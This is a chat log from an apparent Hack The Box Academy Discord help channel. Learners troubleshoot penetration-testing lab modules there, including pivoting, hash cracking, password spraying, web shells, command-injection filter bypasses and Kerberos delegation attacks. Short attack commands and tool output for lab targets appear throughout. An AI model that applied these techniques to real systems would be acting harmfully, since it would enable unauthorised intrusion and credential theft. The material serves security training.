#modules

Is there anyone available , i need help

Just note the module & section you're on; ask your question. If anyone's available they'll speak up. Also it looks like you're new, check out #welcome to connect discord to your HTB account so you can see all the channels & share screen shots.

Hello I am doing actually Module about attacking common services and I am in part attacking SQL databases I have access with mssqlsvc user I have printed a flag but is kind missing some part, is there a possibility to change formatting in sqlcmd that I can see whole output or there is a problem with a flag in this module?

Try mssqlclient

Hi all, I am still going through the pivoting module 🤦‍♂️, and I am struggling from reverse port forwarding and beyond. I know ligolo gets round havine to use SSH -R but I want to understand how to do these techniques anyone know of any resources that are good for pivoting, tunneling and port forwarding? I tried youtube but I haven't really found anything great… I posted in the resources section but got redirected here. I’m struggling to understand why my call back isn’t working even when I verified the back up script is on the target. I can’t move onto double pivot until I get it. So I’m looking for some material to gain a better understanding so I can answer it for my exams in the new year. Thanks

Well the module covers various techniques for that.

Yes I know and I can use ligolo but I am trying to find material that will help me understand how to set up the ssh -R and receive the shell on my listener

that's what they are saying. the pivot module goes over how to use ssh -D

but isnt -D dynamic port forwarding rather than -R being reverse/remote?

port forwarding goes one way

The module doesn’t cover ligolo

Mostly proxychains

I know but I am trying to understand all techniques taught but I am struggling posted various times, so I used another tool. I am not trying to get a quick answer I wqant to understand why what I am currently doing for this one section doesn't work. I used proxychains in the subsection: Dynamic Port Forwarding with SSH and SOCKS Tunneling. I am trying to grasp why in Remote/Reverse Port Forwarding with SSH, I cant get the call back to my nc listener or if I set up my meterpretr reverse shell it won't work

if I done all the pre-reqs dor that subsection should this be the correct syntax: ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.9.2 -vN?

yeah that looks correct

lemme check

think I know where I have gone wrong I was settintg up the python 3 http server on my local vm not on the pivot could be where my error is

ill re-run it, just re-read the section

I could RDP into the next host but it wouldn't go to my meterpreter. I now know why

In the "cracking passwords with hashcat" "Skills assessment-Hashcat" module it has me deicpher a Kerboros TGS ticket. where does the hash start? I tried the complete hash with mode 13100 and Rockyou word list. As well as masks and rules. No luck so far. Am I doing something wrong?

When I put the hash in ' ' or delete the beginning it shows me a "Separator unmatched" error

i've only seen that error when the hash or mode is wrong

take out the last part $

Guys I'm in ad enumeration module, ACL abuse tactics

I keep trying to change damumdsen password but it says there is no user found

But I'm able to see it's there with other commands. I already reset vpn and target

There is no $ at the end

I always reference here https://hashcat.net/wiki/doku.php?id=example_hashes

so "$krb5tgs$23$" would be the start

$ separator

at the end

Yes, I used this as well

It has no $ at the end

referencing the above link

try it like that

I did multiple times

But no success

Tried Rockyou, the infreight mask and multiple rules

yea your syntax works fine

i just copied and pasted the exe through the rdp session and got a nc shell

Mode 13100 is correct?

yes

Ok, I tried the example hash. I get the "no hash loaded" error and "Separator unmatched

Ok, seems the example hash works when I put it in ' '

I am passing Linux Fundamentals module. I have a question: Which option needs to be set to execute a command as a different user using the "su" command? (long version of the option). I answered "--login" to this question but it is incorrect. The correct answer is "--command", WHY?

It takes the hash from htbacademy as well but ko success and status=exhausted

Do I need something special for the TGS? I ran it with rules but it says 13h

13h is if it runs through the whole list, that's not the actual time

Generally takes~ 30minutes at most to crack the crackable pws

Yeah, but I have no idea if this way is the correct one

If there's a pw list given by the module, use it, otherwise typically it's in rockyou

Or any other list that may be mentioned in the section

—login basically simulates another user’s environment

Why then the "correct" answer is "--command"?

Hello, I am stuck on DNS Zone transfers submodule of Information Gathering - Web Edition Module. I keep getting the Status:NXDOMAIN error when I query inlanefreight.htb using dig. I also not able to get any Name servers. Maybe I am doing something wrong

A tiny hint will be appriciated

usually the target you spawn for those types of modules is the nameserver you want to use

I will try them is well. If anyone has a small tip for me it will be highly appreciated. Stuck since 3 hours now

i already told you what's wrong...

that error shows up when the hash or mode is wrong

thanks mate.

got it

Yeah, but if it works it will not solve it. And I tried multiple masks and rules

because it executes commands as another user?

check your hash format, check your mode use the example hashes page to see what it should look like that someone else linked https://hashcat.net/wiki/doku.php?id=example_hashes

It accepts the hash but nothing works. That's why I thought the hash might be the wrong format

wrong wordlist perhaps

you said you got an error when running hashcat "seperator unmatched" ???? are you having a different issue now?

I only get this error when I alter the hash

Might be. But the module only used this and a custom made one

And I don't want to try all in the SEC list repo

I would post a screenshot but even after the account link and restart it won't let me

Linking the account on the website doesn't do anything you need to follow the #welcome instructions

Hi everyone,

Can someone help me?
I am on the module 'Information Gathering - Web Edition' and on the chapter 'Virtual Hosts'.
Can you help me on how to do Brute-force vhosts on the target system. I tried with the command:
gobuster vhost -u <IP-AND-PORT-TARGET> -w /usr/share/secList/Discovery/DNS/subdomain-top-1millions-11000.txt --append-domain

But I get nothing.
Can someone give me a clue?

if dns isn’t set up to resolve the target ip properly, you’ll get nothing

your wordlist is also a bit massive

you’re using append domain but didn’t specify a domain to append

For DNS, how to do because I tried to add in /etc/host but the name inlanefreight.htb is not resolved
otherwise, how to do?

and how to specify the domain to add?

I'm stuck on this one "Attacking Domain Trusts - Child -> Parent Trusts - from Linux", I need to find out the Parent DC IP to proceed but I don't know where to find it

You need a domain to append

Screenshot above. Still sadly no success

Use the full rockyou, not segmented

Also idk if you need to use any rules

ip domain.com

what does the hint say

Where can I find the full? The TGZ also has only the segmented

The tgz should be the full iirc

rockyou.txt.tgz

There is none for that task

THANK YOU!!! That worked

Is there a bug in the module acl abuse tactics?

Bug found; ||skill issue||

Bc I am following the commands and they all work up to the command to change password of user damumdsen where it says user not found. But I can see the user I queried it with powershell

I changed to wley

Who is damumdsen?

:)

User damundsen

Make sure you're spelling it right then

Yes rn I'm on mobile and it's autocorrecting words

On laptop I'm copy pastying

But why does it say user not found if it's literally there and I can query it

¯_(ツ)_/¯

Can I know if it's a bug

why this taking so long??

it’s not

Tf

Did u finish the module?

restart target and try again

haven’t done that module

How do you know it's not a bug

idk because you’re the only one saying it’s a bug?

the machine??

I am asking if it's a bug

If you never did the machine you can't know if it's a bug

reset target and try again

okay, is it a bug?

Trying to find out

wait till you find out the bug is really a skill issue

Trying to find out

wait till you find out the bug is really a skill issue

Reach out to support

Those are the only ones that can tell you 100%

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

still same

what module is this?

not from academy tbh, its a machine chemistry

I put in /etc/hosts

<IP TARGET> inlanefreight.htb

but no result

I mean I just need someone that finished the module to tell me if he got the same error

#boxes

why no result

I don't remember seeing anyone complain or post in #1234357888114364508 about it

ty

You still need to specify the port in your requests

inlanefreight.htb:port

Hi

Active Directory Enumeration & Attacks / Internal Password Spraying - from Windows

Q: Using the examples shown in this section, find a user with the password Winter2022. Submit the username as the answer.

i try this and did not word

PS C:\Tools> . .\DomainPasswordSpray.ps1
PS C:\Tools> Invoke-DomainPasswordSpray -Password Winter2022 -Domain INLANEFREIGHT.LOCAL -OutFile spray_success -ErrorAction SilentlyContinue

[*] Could not connect to the domain. Try specifying the domain name with the -Domain option.

I send this type of request

http://inlanefreight.htb:48214/

but not yet resolved

in my host file:
94.237.63.109 inlanefreight.htb

that’s because the server relies on specific host headers to serve the correct vhost

i swear this is written somewhere in that module

It's ok, I found the problem

awesome

thoughts on working through a pentest with chat gpt? do's and don'ts? specifically in the labs at the end of the modules. Is there a better way?

Absolutely no idea why it didn't work for 4 hours and now it worked ,literally did everything the same

chatgpt is an amazing tool and can help quite a bit, however you still need to know the content to know when chatgpt is wrong. it's awesome for making quick scripts or explaining certain attack paths etc.

anyone got tele

better to ask in #general this channel is dedicated to academy

ok

yea it seems like it can lead you down quite a wormhole if you don't keep it on track and/or remind it of certain things. I was just curious as to how others used it, if at all and if there was a better service for what we are doing other than chatgpt

it says i dont have permison

read and follow the instructions in #rules and #welcome

Can someone help me with the first question with the Laudanum question on the Shells and Payloads module. I'm following the module, but when I do the upload without deleting the comments I get a 404 message. When I delete the comments and art I get runtime errors

:hacker:

Experiencing difficulties in module #Attacking Common Services section SMB. I thought all that was required to download an SMB file within a share was read permissions, is this not the case?

Laudanum shells need to have been made proper changes before they can be used. if you dont you just get served the 404 page as part of laud's stealth stuff

I add the ip of the target as in the module says

Other than deleting the comments and art, im not sure if the file needs anymore editing

Shouldn't it be the IP of your VPN interface? I don't really remember. Point me to the section link

https://academy.hackthebox.com/module/115/section/1122

Hold on let me try something

Yeah, it tells you to add the IP address of your academy VPN

Not the target

Ahhh, okay I guess I missed that part

ooops

@misty current Thank you, I can figure out from here

I dont know what im doing wrong.
Im doing the Attacking Common Services - Easy and i have gotten to the database, and got the webshell but im not able to interact with it.
it says:
The requested URL was not found on this server.
Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 Server at 10.129.156.99 Port 80
When i try to go to <ip>/webshell.php

I used the mysql webshell upload command found in the attacking sql portion but i edited the directory location to what was found in the txt file found on the site.

the fact that this challenge is labeled easy is incredibly humbling.

Doing DACL Attacks I: Skills Assessment and got some WriteDacl to exploit, and only have the user hash from mimikatz and I get that error

does anyone know what could be the issue ?

that was the hardest of the 3 ngl

did you put it in the right directory?

i put it in here Directory|| "C:\xampp\htdocs"||

it showed the ||apache directory in the WebServersInfo.txt||

but im so lost right now

boutta put a webshell in every damn folder on that computer

well, your error says invalid credentials. i used a password here not a hash.

dm the mysql command

there are other vulnerabilities discussed in the module

I have indicated -hashse :d231212..... it should accept it, am I wrong

i can't confirm since i didn't use a hash, but since the message says 'invalid credentials' i'm going to guess its wrong

I will look for a pass, tried to crack the hash but didn't work

i also am not sure you're using the right user

using administrator

NT Authority

well there you go

nt authority isn't a domain user, it has no permissions over users

plus there is no domain nt authority user

so it says invalid creds

use a domain account

but i had this issue where mimikatz won't work except as NT user, and I had to use psexec .\PsExec64.exe -i -s cmd.exe to spawn new cmd

did you use other tool to get the pass ?

ok that doesn't change anything

understandable, one way or the other

ok i see now

i think you were a bit further than i was looking, so i did use a hash but you can't use nt authority on domain stuff

nt authority has permissions over the local system thats it, not any domain objects

I submitted the hash as an answer of one of the question and it's correct, but I think owneredit.py doesn't like the syntax

I could ber wrong

new info to add, thanks

Yo

yoooo

Pentest notes chall , web category , anyone can guide me !

no spoilers please

That wasnt a spoiler, those answers are all wrong

The answers are not lining up with the questions

for previously completed modules

they must have updated the module since you answered then

Guys

This is a hacking server right?

hey

your question doesnt make any sense

How does it not?

“This is a hacking server right?”

Okay so it’s a question

yes, please

compose your question in a way that makes sense

Is this a hacking server

It can NOT get any more simple than that

im asking you

are you sure you're not lost?

😭

how can i use Fierce to check for zone transfers? the module doesn't go in depth on this.

I tried fierce --domain inlanefreight.htb --dns 10.129.203.6
but it didn't work.
Here 10.129.203.6 is the resolver/target

you cant

its not built for that

the module says "Tools like Fierce can also be used to enumerate all DNS servers of the root domain and scan for a DNS zone transfer"

just completed Footprinting in the Pentesters course. Looking for suggestions, do I continue to the next module or try 1-2 easy boxes? I've done the first four modules and haven't done any HTB boxes outside of the modules.

You can try Granny/Grandpa. They are fun easy boxes I reckon

fierce is good for enumerating dns

thats where its usefulness ends

so manually checking for zone transfers is the go?

yes

you can try some, but many of them contain stuff learned later in the path or out of scope for CPTS

ISSUE FIXED It was a typo

Need help with the ids/ips module

Using snort fundamentals

Trying to use snort rules to find the pcap file but idk if I’m writing it wrong

Can tariffs affect hackthebox discord server?

I think this is the wrong chat for that question. It’s also very vague.

But to answer the question shortly and with my personal opinion, no

Why can't I speak in #general

Do I need a role

read and follow the instructions in #rules and #welcome

Okay, thanks @cloud urchin

I have a question regarding https://academy.hackthebox.com/module/109/section/1037 and character shifting:
Despite the explanation about character shifting with echo $(tr '!-}' '"-~'<<<[) I was not able to run any payload equivalent to ls $(tr '!-}' '"-~'<<<.) . Can anyone highlight me on how to encode or amke the $(tr '!-}' '"-~'<<<.) part work?

Just encoding isn't always enough. That command you're using to character shift could contain blacklisted characters and/or other restrictions too.

can anyone provide any hints on skills assessment Q1 of Intro to Whitebox Pentesting? been stuck on this for a couple days and had no luck searching for hints 😦

i'm trying to target the ping function but can't seem to properly escape to get command execution

Hi

I checked out modules why can't I type in general

Because you didn’t read #welcome and followed instructions 🙂

Mid server

why so mad

😞

Sorry

lol

Pls don't dox

😶‍🌫️

If you have a HTB account , identify yourself and your HTB name will show here

What is that

Or just change your username handle, that works too. But you need to identify yourself before you can chat in #general

Are you a bot

No

Cap

that's what a bot would say though

Where my proof

You’re a bot

Lol

Jk. None of us are bots

Why did you edit

Because I made a typo. Wrote bit instead of bot

I know, but i was wondering if anyone had an example for it. I tried with ${FIS}, with tab encoded as urls etc. But couldn't get it to work. SO I was jsut wondering if anyone had a working example so I could learn from it 🙂

Ahh ok. I don't think I even used character shifting for that exercise iirc. Btw the ||tr command might be blacklisted||, so maybe try bypassing that using one of the methods shown in the module.

Oh yeah I managed to get what i want using another method. I just wanted to use that opportunity to practice that is all. Thank you for the help 🙂

Hi guys, can any one help me with this question, it's from the Linux priv escalation module "Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer."

@normal sand never mind there is an example later on, on https://academy.hackthebox.com/module/109/section/1039

I tried using the command 'grep -r HTB' can you please give me some hints

hi! have you solved lab? cant connect using nc

You need to specify the source port to connect with

still i am just getting timeout

idk some magic)))
resetted and used pwnbox and worked

academy DNS down?

or did i mess up my dns

it's from your DNS 😉

usually, when you get this type of an error it is client-side related

thanks @fathom pendant and @midnight galleon

Hi, I've spent lots of time to get this to work but all in vain:

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.```

Any help will be appreciated

I have tried usernames as ./htbdbuser , htbdbuser

SharpUp just does the permission check behind the scenes and tell you what all you can abuse and doesn't exactly list the permission to you in the front (unless there's an flag for it but idk). Also, about the course cherry picking it is because it could have been random if there were a lot of results but in the case of the course, it was the only one which demonstrates service binaries that can be modifed by the current user

Which module/section is this?

This is attacking common services - SQL Databases

I guess your problem is, you're trying to login to the MSSQL with -windows-auth which requires the user's machine where you execute this command to be part of a trusted domain or to have a valid Kerberos ticket digested.

the prerequisite of the exercise is :
Authenticate to 10.129.203.12 (ACADEMY-ATTCOMSVC-WIN-02) with user "htbdbuser" and password "MSSQLAccess01!"

I don't know how I am supposed to authenticate other than that

I think that's just a local MSSQL login

try it without the -windows-auth

i can login as that, but I need privs on the database to access flagDB, and I got a nudge that authenticating to Windows could get me privs

more privs to accessing DB

have anyone tried findstr for hiding data in ADS

File Upload (Bug BOunty Path) -> Type Filters -> a list attached does not exist: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt

There is this one instead I guess https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-all-content-types.txt

I have seclists. It may be the one from there, actually. Just letting mods know to fix it eventually.

#boxes

flagDB part is the second question isn't it? You're supposed to engage the second question with the credentials you got from completing the first question not htbdbuser

hello

hello @slim carbon

How are you ? @storm elk

all good - but this is a channel for supporting people with Academy modules. Please read and follow #welcome to get access to general chat

How are you? 🙂

exactly what the Academy is for

GOOD

?

https://academy.hackthebox.com/

Does it also work for French people?

It works for everyone who speaks english

What if we don't speak it fluently?

Should still work - there are always sites that can help you translate

yes like google translate

and what exactly does the site consist of?

?

Please check the website, you will see what is on there

ok thank you very much for the information

see you soon

Yeah, I figured that I might need to generate a dump via responder and my SMB server, and then crack that hash using john.

Thankyou!

ok so im putting the answer in this textbox but it says its incorrect 💀 can somebody explain to me what im doing wrong

heres the info of the machine to which im connected with RDC

I recommend you mention the module and section name

its the module 49 and section 454 incase somebody needs it

Don't share answers

Also this is unhelpful, module name would be like "Windows Fundamentals" section "information" or something like that, found at the top of the page

windows fundamentals > introduction to windows > Connecting to the Windows Target

done???

Sure

Just giving you helpful tips for the future

tysm!!

That way if you get stuck again, people will be more readily able to help

tyy!

you are being to detailed

see how it says "ie Windows X"?

It's been resolved

;)

Careful of spoilers

Hi everyone!
I'm Elizabeth from South Africa
I'm a business owner and also passionate about business
I'm here to learn more about programming

Hi everyone! Who can I contact for help with the NTLM Relay Attacks Skills Assessment module? I'm stuck on the last question and either can't put all the findings together or I'm just jaded and out of ideas.

Hey people currently doing information gathering web edition but got stuck on the web archives section answer field wont accept Palm Organizer for the paypal bit

any and all help appreciated : )

what do you have so far? I have some crude notes on how I did the skill assessment

Hello everyone!
Can someone help me with the last question of the skills assessment of the DACL II module?
I have the ntlm hash of the ||tangui|| user, i suppose i have to do samaccountname spoofing, but i can't create a computer account and i can't modify the existing ones owned by ||tangui|| user. Any suggestions?

check if tangui has any rights regarding gpos

what was it by chance?

Hello, I'm stuck on (AD Enumeration and Attacks) Credentialed Enumeration - from Windows.
When I'm using SharpHound to generate the .zip file, it just produces a bunch of .json files. And when I try to convert the .json files and compress them all into one .zip file, it doesn't show anything in BloodHound.

don't zip the entire folder just the json files

wait, so if i run
Compress-Archive -Path *.json -DestinationPath inlane.zip

does this not Zip the .json files or it zips the entire folder?

check in the .zip to confirm

blood hound expects the json files to be at the root of the archive

can i dm so i can ask more questions without filling up this chat?

yes

good day everyone!

I want to ask some help regarding one problem

okay

is it possible to trace location by Bitcoin wallet?

because one person wants to scam me badly and sent me her Bitcoin wallet

and since I want to report her to police, I need to get some of hers personal data

no you don't

if its tied to an identity, say via an exchange that requires kyc

Surely they’ll send it to you yeah

yoooo what module is this sounds very interesting

all I have is her probable name, facebook account and bitcoin wallet

awesome

worst is that she uses "Sex scam" ... like, she will pay you for hook up, but you have to send her 80 dollars on BTC wallet OR Steam Gift Card

No one cares mate

Just report it to authorities or something

exactly, to report her I need her personal data

I live in Estonia btw

she pays you?

no you don't

how can i start

no, she does not

Not really, can just report the situation

Anyways

We can’t do anything about it

i'll suggest leaving the situation alone buddy

ok

The police can subpoena for for identifying information. You don't need to collect it.

does anyone know why i have always this error with mimikatz
Program 'mimikatz.exe' failed to run: The specified executable is not a valid application for this OS platform.At
line:1 char:1

Are you actually trying to run the executable?

yes

Double check. That error doesn't sound like you have a valid exactable.

okay, fixed, .exe was corrupted during uplink

After a lot of swearing and frustration.. 😄 Thought I was going crazy, but it was all about me running via VPN instead of pwnbox... 😄

Hi, im learning the linux fundamentals module and when I try to connect via ssh I get an error, could someone help me?

what's the error

ssh: connect to host 10.129.45.245 port 22: No route to host

guessing you're on your own machine / VM, did the VPN start correcty ?

Yeah I think so, I get this message in the terminal "Initialization Sequence Completed"

any1 else have this problem or am i just lacking braincells

what does the question say?

I solved the problem

on the double pivot section of Pivoting, Tunneling, and Port Forwarding, is it common for the .155 box to drop out a lot?

According to the paypal.com website in October 1999, what could you use to "beam money to anyone"? Answer with the product name, eg My Device, remove the ™ from your answer.

ive tried it with spaces,nospaces,using caps and no caps,with the TM and without no idea why it wont work

because it’s a wrong answer

there is only 1 archive for october 1999 and thats the only thing on it

no

look harder

its also the only thing with TM in the name

yes

your answer looks right

but still not in the right format

look harder

oh my days

actual brain damage O -- 0

thank you man

awesome

i quit computers

returning to the st 0 ne age

Anyone can help me?
im doing kerberoast and i receive this error
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Google the error

googled. does not work any solution, im using proxychains

i googled and it says you need to sync date with the dc

yes

What module

And can you reach the dc?

attacking entrprise network - active directory compromise

i can reach via proxychains from the machine where i want to kerberoast

currently im in the skills assessment for "Information Gathering"
my QA fields are totally bugged, i havent touched this box previously but there are already answeres entered, but wrong ones and now i cant enter the actual answeres...

contact support on the site

If you did the module in the past, then that's why. But yeah reach out to support

no there are totaly wrong answers, like whats the api key, and as answer is "cat factory 1" xD

I have a question about Pro lab Zephyr. Is there a channel on this server where its appropriate to ask these kinds of questions?

Yes, because those are the answers to the previous version of the module

#1263635449335910531 , you might need to read and follow #welcome to access

ahh ok

thank you

alr thx

ping

The error means you need to sync your clock with the DC

take this holy command from me and don't question it

faketime "$(ntpdate -q ${ip} | cut -d ' ' -f 1,2)" \
command-to-run

faketime temporarily set time to anything u specify for the next command, the ntpdate part takes the time from the dc ip

it has

It should be at the bottom, if you answer all the questions

did u complete all questions?

this is the main problem

this means u can't see that ip

ur pivot is not working

do proxychains ping ip

icmp works over proxychains?

not sure

but since nmap works ig yes?

but yeah u -Pn nmap so prolly no

ok do proxychain nmap ip -sn -Pn

okay does not work

btw iirc u can use external ip of dc to get time

I was questioning Sora0 if they knew some magic of icmp that I wasn't aware of.

😐

okay ill try

icmp does not work over proxychain

Your best bet for HD over proxychains is full TCP connect scans

I recommend you use ligolo ng instead

it’s going to be horrendously slow

Even doing the common 5 ports it'll take a while.

yeah i corrected it in the next message

academy vpn from inside vm 👀
suddenly stopped working

using NAT

normal internet works

how can i fix it?

Redownload config?

did so

Try different server?

changed area too

restart? ¯_(ツ)_/¯

restarted

seems like a DNS thing

Prepare 3 envelopes, get divorced, hit the gym.

have you verified you have access to internet?

did all (not married so basically i am divorced)

yes

Make sure your DNS is working?

reboot host

rebooted

reset vm

I would kill myself if i lost that vm

would be an easy fix, but a last resort

check ovpn logs

switch from NAT to bridged mode

things tend to worse when i do that but i will try not to mess it up

now nothing works

good step

hi everyone,

could someone give me a hint on the skill assessment of Information Gathering - Web Edition on the part: What is the API key in the hidden admin directory that you have discovered on the target system?

I've been on it for a few hours

subdomain enum

how to specify a port with dnsenum?

I used ffuf

use ffuf

use https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-110000.txt

this wordlist

and make sure to add the subdomain to your /etc/hosts and enum that subdomain for more directories and subdomains

by running a FUZZ

http://FUZZ.inlanefreight.htb:port I get nothing or with http://inlanefreight.htb:PORT/FUZZ I get something but not much useful

so im going through this

and in the learning mod it links a "learning pyramid" article. the mod itself is using it as some sort of source for active and passive learning types, but the whole wiki article is just shitting on it as a "group of ineffective[2] learning models and representations relating different degrees of retention induced from various types of learning."

not exactly a good start lmao

okay, so instead of a staff member addressing what is a pretty big hit to credibility to these courses within the first 5 minutes of reading, you just randomize my nickname. beautiful stuff

Sorry, but not all staff/moderators can address your issues.

well you see, you've got this ability to contact any level of staff while a person like me is unable to even type in the general chat, so you saying "you can't address it" is a bad look

I can’t contact any level of staff. You being unable to talk in #general is just because you didn’t read and follow instructions in #welcome

Most moderators here on the discord are volunteers

i would quite literally payal you 5k$ right now if you could straight up prove you don't have access to some sort of text channel that would allow you to @ping any member of staff on this discord regarding some sort of issue

If you feel there is an error in the module, please post in #1234357888114364508

waited a second for your response or to see if you were going to type, guess not. so please don't lie about your inability to contact other members of staff, it's a bad look.

learning process is a often criticized module, the actual technical modules are much better and most ppl just skip learning process

just going based off of what the site is recommending in terms of courses, probably shouldn't be recommending it if people have issues with it, especially when it seems to be a bunch of psuedo science so far

In API Attacks --> Broken Authentication section, - I'm not sure how am i supposed to bypass the OTP authentication, which it requires email/phone access which I do not have.

entire section dedicated to a "learning pyramid" that apparently is on par with the 2000s food pyramid shit that kids were forced to learn about

hope you had your daily grain intake

Your nick was changed likely because it didn't comply with #rules

If you're not happy, contact support or report an issue in #1234357888114364508 , if you don't like the content, that's up to you.

🍞

You are not forced to learn this though. Just coz site recommends something doesnt mean its best starting point for everyone

No need to have your panties in a twist

If it contained non-ascii/English characters it gets changed

Although yeah, I agree that its kinda useless content based on the description

It's as simple as that

so i will repeat because maybe this point was lost in the reading comprehension bit. i am not annoyed that my nick was changed, and i understand why it would be. the issue is that i bring up what should be a pretty big flaw with the intro course because its based on bull-science, and instead of someone addressing that, they just change my nick and go radio silent lmao.

No one changed your nick, it's generally done by a bot

no

¯_(ツ)_/¯

I changed it as it was all question marks.

not in this situation

Ah

color me shocked

i guess im capable of finding out whether or not an action was automated

crazy

And mod ≠ staff

And as I said before, not every moderator can help you with content stuff. I am a volunteer and not staff.

/feedback is useful as well

No need to be rude about stuff.

But overall it's just a small portion of the overall course, everyone learns a little differently

It's not that deep

yeah we're going in circles now. i already said something to this response as well, i offered 5k for you to prove you don't have a channel to communicate with non-volunteer staff, and you didnt take me up on it.

this kind of the issue with butting into conversations that you aren't willing to read the context on, it just leads to words being repeated

if there’s an issue with the module you can post in #1234357888114364508 it’ll get resolved faster that way

got that, will do

As if I give a singular flying fuck if you can offer $5k

it's not

for you

jesus christ man lmao

awesome

this is why you need to read convos before giving your opinion

You're just an entitled twatmuffin

lol

That's what I gathered from what I've read

:)

Right, let's move on

he makes a valid point

i think this intro course has a section of handling frustration, can someone link it for him

but wrong delivery

I can ping the mods for you for 5k

No need to be passive aggressive

The Process: Handling Frustration

I think we should now return to the topic of this channel.
I recommend that you read and follow #welcome. Then you will also have access to the #general channel.

https://tenor.com/view/ginascantina-gif-24623482

will do

Either way, you were informed of a better way to report things you feel are off. And modules also have a review when you finish them.

i think you can drop it now man. they just let you get away with calling me an "entitled twatmuffin" so you've be given some leeway lmao

@winter schooner can you help me?

I just call it as I see it

maybe you need to bruteforce it

¯_(ツ)_/¯

Anyway gotta get back to packing

and i don't really get emotionally invested in discord chats

perhaps because im a believer in the Handling Frustration module

Who said I'm emotionally invested? Lmao

Right guys, lets move on

Tried that, Didnt work

Dm me and I will help

Doesn't the module show several ways to bruteforce?

I.e. generating a list of 0000 to 9999

In that section, only the use of fuff and the wordlist xato-net-10-million-passwords-10000.txt

make a list from 0000 to 9999

I take it you've done the module, I swear it talked about generating an OTP list for numbers

Or at least I've seen others talking about it

the email in that section is the scenario you are working with

you assume that you receive a similar email

Why cant i write in general

Read and follow #welcome

Hello, I'm solving the DNS footprinting. i got all most all the answers, but im stuck on the last question. Which is: What is the FQDN of the host where the last octet ends with "x.x.x.203"?
Please me out, I tried all the mentioned methods. But still no Luck yet.

Subdomain of Subdomain

You have to find all the zones.
Take another look at the configuration options for a zone.

subdomains can have their own zones

dont know if that makes sense

😕

That's really the best hint that can be given without a direct spoiler

whats the issue?

Ad attack - miscellaneous misconfigurations - second question

I found the hash but I can't crack it, I used the command given in the module with rockyou.txt and another wordlist that I don't remember but it isn't cracking.
Hashcat gets exhausted after a while and john doesn't even recognize the hash, I also tried kirbi2john but it's the same.
Now I used a?a?a?a?a?a?a?a? and its still going after a good 30 minutes

I cracked the hash of mmorgan almost immediately with hashcat, idk what's going on with this one. Yes I copied the hash correctly in multiple files but it's still the same thing

what does the question say

Find another user with "do not require kerberos pre auth setting" enabled. Perform aspreroasting attack against this user, crack the hash and submit the clear text password as the answer

Why are you using a mask?

You shouldn't need to use any sort of mask to crack it

Rock you isn't working and another one too

I don't remember the name tho

Also are you sure it's a hash you're meant to crack?

It's the user that starts with y

It's the only other user

Ay

Uh?

Nvm, i just checked the password should he in rockyou from what I recall, and you performed an ASREProasting attack yeah?

Yes and I found both mmorgan and y

Rock you gets exhausted with hashcat

I believe there may be another user but it shouldn't miss it

Mmmmmmmmm

Is the user in the second target?

I wasn't able to access it

No

Aight

I'm looking at powershell rn and there's only mmorgan and y

I also tried hashcat on the pwnbox same thing

Give me a few minutes and I'll check and see if I have the hash saved

Thx

No fucking way

Ye I'm an idiot it cracked

└─$ smtp-user-enum -M RCPT -U users.list.1 -D inlanefreight.htb -t 10.129.119.250
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... users.list.1
Target count ............. 1
Username count ........... 79
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ inlanefreight.htb

######## Scan started at Mon Dec  2 17:47:03 2024 #########
######## Scan completed at Mon Dec  2 17:48:23 2024 #########
0 results.

79 queries in 80 seconds (1.0 queries / sec)
                                                 
┌──(kali㉿kali)-[~]
└─$ smtp-user-enum -M RCPT -U users.list.1 -D inlanefreight.htb -t 10.129.197.255
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... users.list.1
Target count ............. 1
Username count ........... 79
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ inlanefreight.htb

######## Scan started at Mon Dec  2 17:49:22 2024 #########
10.129.197.255: fiona@inlanefreight.htb exists
######## Scan completed at Mon Dec  2 17:49:46 2024 #########
1 results.

79 queries in 24 seconds (3.3 queries / sec)
                                                 
┌──(kali㉿kali)-[~]
└─$ ```

Why do I need to reset the lab sometimes to get it working?

I don't know for certain, but I imagine something hiccups when the deployment script is running and derails the process of setting up a lab. I haven't seen it often but it is maddening when encountered.

Yeah, it misleads. I had to totally shift my approach for enumerating

Can I dm someone about AEN module?

Usually need to increase the timeout with that tool

Hi!
Anyone who can help me with the module of web application pentester senior. In the module XSS Filter by passes?
I was able to find the payload to bypass the filter and I am receiving data in the exfiltrate server
but I am gettingNetworkError: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'http://vulnerablesite.htb/home.php'
I tried many ways but I got nothing.
Help please 😦

Module name: Kerberos Attacks
Section: Unconstrained Delegation - Users

Hi guys,
I would really appreciate some help with this section. Whenever I get to the part where I’m running dementor.py, or printerbug.py- I get an error on krbrelayx.py saying
“Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'”
And essentially I’m not getting a TGT.
I tried **every **possible solution I could find online and I still cant figure it out.
I tried restarting the machine a few times, and also tried the lab both from the pwnbox and from my own kali lab.

-made sure that the hosts file has a record for inlanefreight.local and dc01.inlanefreight.local
-when creating the DNS record I used NSLOOKUP to make sure that it resolves to my IP
-when creating the fake SPN, I made sure that it exists by using addspn.py to query callum.dixon
-tried running krbrelayx.py with callum.dixon’s user/pass or hashes
-re-installed impacket

would appreciate any help!!!!
thank you

Yea

spn should align with the target user

this is the command im using-
python addspn.py -u INLANEFREIGHT.LOCAL\carole.rose -p jasmine --target-type samname -t callum.dixon -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local

hide spoilers

does that user have perms to modify another user

